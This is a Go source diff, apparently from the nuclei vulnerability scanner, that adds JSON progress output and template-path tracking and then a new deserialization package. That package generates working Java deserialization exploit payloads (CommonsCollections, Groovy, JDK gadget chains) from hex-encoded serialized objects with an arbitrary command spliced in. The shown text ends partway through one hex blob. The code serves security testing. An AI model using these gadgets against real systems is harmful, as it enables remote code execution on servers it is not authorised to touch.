a/v2/pkg/progress/progress.go +++ b/v2/pkg/progress/progress.go @@ -6,6 +6,7 @@ import ( "fmt" "net" "net/http" + "os" "strconv" "strings" "time" @@ -39,13 +40,14 @@ var _ Progress = &StatsTicker{} // StatsTicker is a progress instance for showing program stats type StatsTicker struct { active bool - tickDuration time.Duration - stats clistats.StatisticsClient + outputJSON bool server *http.Server + stats clistats.StatisticsClient + tickDuration time.Duration } // NewStatsTicker creates and returns a new progress tracking object. 
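// A minimal call sketch for the updated signature (the argument values are illustrative
// only and not defaults introduced by this change):
//
//	progress, err := NewStatsTicker(5, true, false, false, 0) // duration, active, outputJSON, metrics, port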
-func NewStatsTicker(duration int, active, metrics bool, port int) (Progress, error) { +func NewStatsTicker(duration int, active, outputJSON, metrics bool, port int) (Progress, error) { var tickDuration time.Duration if active { tickDuration = time.Duration(duration) * time.Second @@ -62,6 +64,7 @@ func NewStatsTicker(duration int, active, metrics bool, port int) (Progress, err progress.active = active progress.stats = stats progress.tickDuration = tickDuration + progress.outputJSON = outputJSON if metrics { http.HandleFunc("/metrics", func(w http.ResponseWriter, req *http.Request) { @@ -92,7 +95,13 @@ func (p *StatsTicker) Init(hostCount int64, rulesCount int, requestCount int64) p.stats.AddCounter("total", uint64(requestCount)) if p.active { - if err := p.stats.Start(printCallback, p.tickDuration); err != nil { + var printCallbackFunc clistats.PrintCallback + if p.outputJSON { + printCallbackFunc = printCallbackJSON + } else { + printCallbackFunc = printCallback + } + if err := p.stats.Start(printCallbackFunc, p.tickDuration); err != nil { gologger.Warning().Msgf("Couldn't start statistics: %s", err) } } @@ -167,30 +176,35 @@ func printCallback(stats clistats.StatisticsClient) { builder.WriteRune(')') builder.WriteRune('\n') - gologger.Print().Msgf("%s", builder.String()) + fmt.Fprintf(os.Stderr, "%s", builder.String()) } -// getMetrics returns a map of important metrics for client -func (p *StatsTicker) getMetrics() map[string]interface{} { +func printCallbackJSON(stats clistats.StatisticsClient) { + builder := &strings.Builder{} + _ = json.NewEncoder(builder).Encode(metricsMap(stats)) + fmt.Fprintf(os.Stderr, "%s", builder.String()) +} + +func metricsMap(stats clistats.StatisticsClient) map[string]interface{} { results := make(map[string]interface{}) - startedAt, _ := p.stats.GetStatic("startedAt") + startedAt, _ := stats.GetStatic("startedAt") duration := time.Since(startedAt.(time.Time)) results["startedAt"] = startedAt.(time.Time) results["duration"] = fmtDuration(duration) - templates, _ := p.stats.GetStatic("templates") + templates, _ := stats.GetStatic("templates") results["templates"] = clistats.String(templates) - hosts, _ := p.stats.GetStatic("hosts") + hosts, _ := stats.GetStatic("hosts") results["hosts"] = clistats.String(hosts) - matched, _ := p.stats.GetCounter("matched") + matched, _ := stats.GetCounter("matched") results["matched"] = clistats.String(matched) - requests, _ := p.stats.GetCounter("requests") + requests, _ := stats.GetCounter("requests") results["requests"] = clistats.String(requests) - total, _ := p.stats.GetCounter("total") + total, _ := stats.GetCounter("total") results["total"] = clistats.String(total) results["rps"] = clistats.String(uint64(float64(requests) / duration.Seconds())) - errors, _ := p.stats.GetCounter("errors") + errors, _ := stats.GetCounter("errors") results["errors"] = clistats.String(errors) //nolint:gomnd // this is not a magic number @@ -200,6 +214,11 @@ func (p *StatsTicker) getMetrics() map[string]interface{} { return results } +// getMetrics returns a map of important metrics for client +func (p *StatsTicker) getMetrics() map[string]interface{} { + return metricsMap(p.stats) +} + // fmtDuration formats the duration for the time elapsed func fmtDuration(d time.Duration) string { d = d.Round(time.Second) @@ -215,7 +234,11 @@ func fmtDuration(d time.Duration) string { func (p *StatsTicker) Stop() { if p.active { // Print one final summary - printCallback(p.stats) + if p.outputJSON { + printCallbackJSON(p.stats) + } else { + 
printCallback(p.stats) + } if err := p.stats.Stop(); err != nil { gologger.Warning().Msgf("Couldn't stop statistics: %s", err) } diff --git a/v2/pkg/protocols/common/clusterer/executer.go b/v2/pkg/protocols/common/clusterer/executer.go index 84207ab11e..758e99b837 100644 --- a/v2/pkg/protocols/common/clusterer/executer.go +++ b/v2/pkg/protocols/common/clusterer/executer.go @@ -22,6 +22,7 @@ type Executer struct { type clusteredOperator struct { templateID string + templatePath string templateInfo map[string]interface{} operator *operators.Operators } @@ -38,6 +39,7 @@ func NewExecuter(requests []*templates.Template, options *protocols.ExecuterOpti executer.operators = append(executer.operators, &clusteredOperator{ templateID: req.ID, templateInfo: req.Info, + templatePath: req.Path, operator: req.RequestsHTTP[0].CompiledOperators, }) } @@ -60,13 +62,15 @@ func (e *Executer) Requests() int { func (e *Executer) Execute(input string) (bool, error) { var results bool + previous := make(map[string]interface{}) dynamicValues := make(map[string]interface{}) - err := e.requests.ExecuteWithResults(input, dynamicValues, nil, func(event *output.InternalWrappedEvent) { + err := e.requests.ExecuteWithResults(input, dynamicValues, previous, func(event *output.InternalWrappedEvent) { for _, operator := range e.operators { result, matched := operator.operator.Execute(event.InternalEvent, e.requests.Match, e.requests.Extract) if matched && result != nil { event.OperatorsResult = result event.InternalEvent["template-id"] = operator.templateID + event.InternalEvent["template-path"] = operator.templatePath event.InternalEvent["template-info"] = operator.templateInfo event.Results = e.requests.MakeResultEvent(event) results = true @@ -94,6 +98,7 @@ func (e *Executer) ExecuteWithResults(input string, callback protocols.OutputEve if matched && result != nil { event.OperatorsResult = result event.InternalEvent["template-id"] = operator.templateID + event.InternalEvent["template-path"] = operator.templatePath event.InternalEvent["template-info"] = operator.templateInfo event.Results = e.requests.MakeResultEvent(event) callback(event) diff --git a/v2/pkg/protocols/common/expressions/expressions.go b/v2/pkg/protocols/common/expressions/expressions.go index 5f6d46541b..18010c8831 100644 --- a/v2/pkg/protocols/common/expressions/expressions.go +++ b/v2/pkg/protocols/common/expressions/expressions.go @@ -31,3 +31,30 @@ func Evaluate(data string, base map[string]interface{}) (string, error) { // Replacer dynamic values if any in raw request and parse it return replacer.Replace(data, dynamicValues), nil } + +// EvaluateByte checks if the match contains a dynamic variable, for each +// found one we will check if it's an expression and can +// be compiled, it will be evaluated and the results will be returned. +// +// The provided keys from finalValues will be used as variable names +// for substitution inside the expression. 
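// A rough usage sketch (the payload, the variable name and the base64 helper are
// assumptions for illustration, not taken from this change):
//
//	raw := []byte(`token={{base64("{{username}}")}}`)
//	out, err := EvaluateByte(raw, map[string]interface{}{"username": "admin"})
//	// out holds the input with {{...}} markers replaced and evaluable expressions resolved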
+func EvaluateByte(data []byte, base map[string]interface{}) ([]byte, error) {
+	final := replacer.Replace(string(data), base)
+
+	dynamicValues := make(map[string]interface{})
+	for _, match := range templateExpressionRegex.FindAllString(final, -1) {
+		expr := generators.TrimDelimiters(match)
+
+		compiled, err := govaluate.NewEvaluableExpressionWithFunctions(expr, dsl.HelperFunctions())
+		if err != nil {
+			continue
+		}
+		result, err := compiled.Evaluate(base)
+		if err != nil {
+			continue
+		}
+		dynamicValues[expr] = result
+	}
+	// Replace dynamic values, if any, in the raw request and parse it
+	return []byte(replacer.Replace(final, dynamicValues)), nil
+}
diff --git a/v2/pkg/protocols/common/helpers/deserialization/deserialization.go b/v2/pkg/protocols/common/helpers/deserialization/deserialization.go
new file mode 100644
index 0000000000..fc27f5f634
--- /dev/null
+++ b/v2/pkg/protocols/common/helpers/deserialization/deserialization.go
@@ -0,0 +1,2 @@
+// Package deserialization implements helpers for deserialization issues in nuclei.
+package deserialization
diff --git a/v2/pkg/protocols/common/helpers/deserialization/helpers.go b/v2/pkg/protocols/common/helpers/deserialization/helpers.go
new file mode 100644
index 0000000000..84923c17c9
--- /dev/null
+++ b/v2/pkg/protocols/common/helpers/deserialization/helpers.go
@@ -0,0 +1,17 @@
+package deserialization
+
+import "bytes"
+
+func InsertInto(s string, interval int, sep rune) string {
+	var buffer bytes.Buffer
+	before := interval - 1
+	last := len(s) - 1
+	for i, char := range s {
+		buffer.WriteRune(char)
+		if i%interval == before && i != last {
+			buffer.WriteRune(sep)
+		}
+	}
+	buffer.WriteRune(sep)
+	return buffer.String()
+}
diff --git a/v2/pkg/protocols/common/helpers/deserialization/java.go b/v2/pkg/protocols/common/helpers/deserialization/java.go
new file mode 100644
index 0000000000..8aee3e27ed
--- /dev/null
+++ b/v2/pkg/protocols/common/helpers/deserialization/java.go
@@ -0,0 +1,162 @@
+package deserialization
+
+import (
+	"bytes"
+	"compress/gzip"
+	"encoding/base64"
+	"encoding/hex"
+	"strings"
+)
+
+// Taken from: https://github.com/joaomatosf/jexboss/blob/master/_exploits.py
+// All credits go to the original authors of the Jexboss Project.
+
+// GenerateJavaGadget generates a gadget for a command with the given encoding.
+// If the encoding is blank, gadgets are returned base64 encoded by default.
+func GenerateJavaGadget(gadget, cmd, encoding string) string {
+	var returnData []byte
+
+	switch gadget {
+	case "dns":
+		returnData = generateDNSPayload(cmd)
+	case "jdk7u21":
+		returnData = generatejdk7u21Payload(cmd)
+	case "jdk8u20":
+		returnData = generatejdk8u20Payload(cmd)
+	case "commons-collections3.1":
+		returnData = generateCommonsCollections31Payload(cmd)
+	case "commons-collections4.0":
+		returnData = generateCommonsCollections40Payload(cmd)
+	case "groovy1":
+		returnData = generateGroovy1Payload(cmd)
+	default:
+		return ""
+	}
+	if returnData == nil {
+		return ""
+	}
+	return gadgetEncodingHelper(returnData, encoding)
+}
+
+// gadgetEncodingHelper performs encoding of the generated gadget based on the provided
+// options.
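// Supported values in the switch below are "raw", "hex", "gzip" and "gzip-base64"; any
// other value (including an empty string) falls back to standard base64 with '+'
// percent-encoded as %2B.
//
// A hedged example of the exported entry point (gadget and command are illustrative only):
//
//	payload := GenerateJavaGadget("commons-collections3.1", "nslookup example.com", "")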
+func gadgetEncodingHelper(returnData []byte, encoding string) string { + switch encoding { + case "raw": + return string(returnData) + case "hex": + return hex.EncodeToString(returnData) + case "gzip": + buffer := &bytes.Buffer{} + if _, err := gzip.NewWriter(buffer).Write(returnData); err != nil { + return "" + } + return buffer.String() + case "gzip-base64": + buffer := &bytes.Buffer{} + if _, err := gzip.NewWriter(buffer).Write(returnData); err != nil { + return "" + } + return urlsafeBase64Encode(buffer.Bytes()) + default: + return urlsafeBase64Encode(returnData) + } +} + +func urlsafeBase64Encode(data []byte) string { + return strings.ReplaceAll(base64.StdEncoding.EncodeToString(data), "+", "%2B") +} + +// generateCommonsCollections40Payload generates org.apache.commons:commons-collections4:4.0 +// deserialization paylaod for a command. +func generateCommonsCollections40Payload(cmd string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B787000000002737200426F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E636F6D70617261746F72732E5472616E73666F726D696E67436F6D70617261746F722FF984F02BB108CC0200024C00096465636F726174656471007E00014C000B7472616E73666F726D657274002D4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E73342F5472616E73666F726D65723B7870737200406F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002E5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E73342F5472616E73666F726D65723B78707572002E5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E5472616E73666F726D65723B39813AFB08DA3FA50200007870000000027372003C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C0200007870000000017372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00144C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E002000078700000068CCAFEBABE0000003100380A0003002207003607002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265
725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E0100") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(cmd)))) + buffer.WriteString(cmd) + suffix, _ := 
hex.DecodeString("08003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401001E79736F73657269616C2F50776E65723131353636353933373838363330390100204C79736F73657269616C2F50776E65723131353636353933373838363330393B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002E000E0000000C000100000005000F003700000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000033000E00000020000300000001000F0037000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000037000E0000002A000400000001000F003700000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C0000001B000300020000000FA70003014CB8002F1231B6003557B1000000000002002000000002002100110000000A000100020023001000097571007E001F000001D4CAFEBABE00000031001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003B000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C6174657300000000000000000000007870770400000003737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B02000078700000000171007E002978") + buffer.Write(suffix) + + return buffer.Bytes() +} + +// generateCommonsCollections440PPayload generates commons-collections 3.1 +// deserialization paylaod for a command. 
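// The command below is spliced between a fixed serialized-object prefix and suffix,
// with its length written immediately before it via string(rune(len(cmd))).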
+func generateCommonsCollections31Payload(cmd string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B787074002668747470733A2F2F6769746875622E636F6D2F6A6F616F6D61746F73662F6A6578626F7373207372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001B00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001B7371007E00137571007E001800000002707571007E001800000000740006696E766F6B657571007E001B00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E00187371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(cmd)))) + buffer.WriteString(cmd) + suffix, _ := hex.DecodeString("740004657865637571007E001B0000000171007E00207371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878") + buffer.Write(suffix) + + return buffer.Bytes() +} + +// generateGroovy1Payload generates org.codehaus.groovy:groovy:2.3.9 +// deserialization paylaod for a command. 
+func generateGroovy1Payload(cmd string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002C6F72672E636F6465686175732E67726F6F76792E72756E74696D652E436F6E766572746564436C6F7375726510233719F715DD1B0200014C000A6D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B7872002D6F72672E636F6465686175732E67726F6F76792E72756E74696D652E436F6E76657273696F6E48616E646C65721023371AD601BC1B0200024C000864656C65676174657400124C6A6176612F6C616E672F4F626A6563743B4C000B68616E646C6543616368657400284C6A6176612F7574696C2F636F6E63757272656E742F436F6E63757272656E74486173684D61703B7870737200296F72672E636F6465686175732E67726F6F76792E72756E74696D652E4D6574686F64436C6F73757265110E3E848FBDCE480200014C00066D6574686F6471007E00097872001367726F6F76792E6C616E672E436C6F737572653CA0C76616126C5A0200084900096469726563746976654900196D6178696D756D4E756D6265724F66506172616D657465727349000F7265736F6C766553747261746567794C000362637774003C4C6F72672F636F6465686175732F67726F6F76792F72756E74696D652F63616C6C736974652F426F6F6C65616E436C6F73757265577261707065723B4C000864656C656761746571007E000B4C00056F776E657271007E000B5B000E706172616D6574657254797065737400125B4C6A6176612F6C616E672F436C6173733B4C000A746869734F626A65637471007E000B7870000000000000000200000000707400") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(cmd)))) + buffer.WriteString(cmd) + suffix, _ := 
hex.DecodeString("71007E0013757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A99020000787000000002767200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B4702000078707672000C6A6176612E696F2E46696C65042DA4450E0DE4FF0300014C00047061746871007E000978707074000765786563757465737200266A6176612E7574696C2E636F6E63757272656E742E436F6E63757272656E74486173684D61706499DE129D87293D03000349000B7365676D656E744D61736B49000C7365676D656E7453686966745B00087365676D656E74737400315B4C6A6176612F7574696C2F636F6E63757272656E742F436F6E63757272656E74486173684D6170245365676D656E743B78700000000F0000001C757200315B4C6A6176612E7574696C2E636F6E63757272656E742E436F6E63757272656E74486173684D6170245365676D656E743B52773F41329B39740200007870000000107372002E6A6176612E7574696C2E636F6E63757272656E742E436F6E63757272656E74486173684D6170245365676D656E741F364C905893293D02000146000A6C6F6164466163746F72787200286A6176612E7574696C2E636F6E63757272656E742E6C6F636B732E5265656E7472616E744C6F636B6655A82C2CC86AEB0200014C000473796E6374002F4C6A6176612F7574696C2F636F6E63757272656E742F6C6F636B732F5265656E7472616E744C6F636B2453796E633B7870737200346A6176612E7574696C2E636F6E63757272656E742E6C6F636B732E5265656E7472616E744C6F636B244E6F6E6661697253796E63658832E7537BBF0B0200007872002D6A6176612E7574696C2E636F6E63757272656E742E6C6F636B732E5265656E7472616E744C6F636B2453796E63B81EA294AA445A7C020000787200356A6176612E7574696C2E636F6E63757272656E742E6C6F636B732E416273747261637451756575656453796E6368726F6E697A65726655A843753F52E30200014900057374617465787200366A6176612E7574696C2E636F6E63757272656E742E6C6F636B732E41627374726163744F776E61626C6553796E6368726F6E697A657233DFAFB9AD6D6FA90200007870000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F400000707078740008656E747279536574767200126A6176612E6C616E672E4F7665727269646500000000000000000000007870") + buffer.Write(suffix) + + return buffer.Bytes() +} + +// generateDNSPayload generates DNS interaction deserialization paylaod for a DNS Name. +// Based on Gabriel Lawrence gadget +func generateDNSPayload(url string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00034C0004686F737471007E00034C000870726F746F636F6C71007E00034C000372656671007E00037870FFFFFFFFFFFFFFFF7400") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(url)))) + buffer.WriteString(url) + suffix, _ := hex.DecodeString("74000071007E00057400056874747073707874001968747470733A2F2F746573742E6A6578626F73732E696E666F78") + buffer.Write(suffix) + + return buffer.Bytes() +} + +// generatejdk7u21Payload generates deserialization payload for jdk7. 
+// improved from frohoff version +func generatejdk7u21Payload(url string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED0005737200176A6176612E7574696C2E4C696E6B656448617368536574D86CD75A95DD2A1E020000787200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000103F400000000000027372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000849000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785A00155F75736553657276696365734D656368616E69736D4C000B5F617578436C617373657374003B4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF0070757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E00200007870000006") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(url) + 131))) + middle, _ := hex.DecodeString("CAFEBABE0000003100380A0003002207003607002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74
